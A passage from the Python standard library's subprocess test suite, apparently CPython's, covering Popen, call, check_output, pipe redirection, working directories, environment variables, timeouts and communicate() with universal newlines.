try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
raise unittest.SkitTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
# Windows pipe size can be acquired via GetNamedPipeInfoFunction
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# However, this function is not yet in _winapi.
p.stdin.write(b"pear")
p.stdin.close()
finally:
p.kill()
p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
